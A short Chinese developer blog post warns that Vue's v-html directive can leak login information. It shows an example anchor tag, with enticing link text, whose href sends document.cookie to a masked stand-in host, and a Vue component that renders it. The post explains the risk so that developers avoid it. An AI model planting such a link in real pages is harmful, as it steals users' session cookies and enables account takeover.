慎用v-html点击链接就可能泄露信息

vue官网有这样一段话，那么v-html怎么就危险了？

做前端的我们知道，一个网站的登陆标识是靠后端返回的token决定是否登录的，一般会把这个token标识就存在浏览器的本地储存中storage，登录后cookie中就会有登录的标识。

由此，只要拿到这个cookie标识，即可登录这个标识对应的用户。

那么这个和v-html有什么关系呢？

如果有一个html代码块，是这样的：

<a href=`http://**.xx.com?aa=${document.cookie}`>诱导性的文字</a>

按照前端习惯，会把html标签使用v-html指令渲染出来展示。然后就会得到这样的结果：

<template> <div> <div v-html="htmls"></div> </div></template> 
<script>export default { data(){ return{ htmls:`<a href='http://**.xx.com?aa=${document.cookie}'>诱导性的文字</a>` } },}</script>

渲染出来的是一个a标签，这时候如果一旦点击，那么顺带就会拿走你网站的cookie，而这个cookie中就可能有登录的标识。

获取到登录标识，就可能直接进入用户界面了。

以上内容来自前端小学生的浅谈，欢迎批评指正。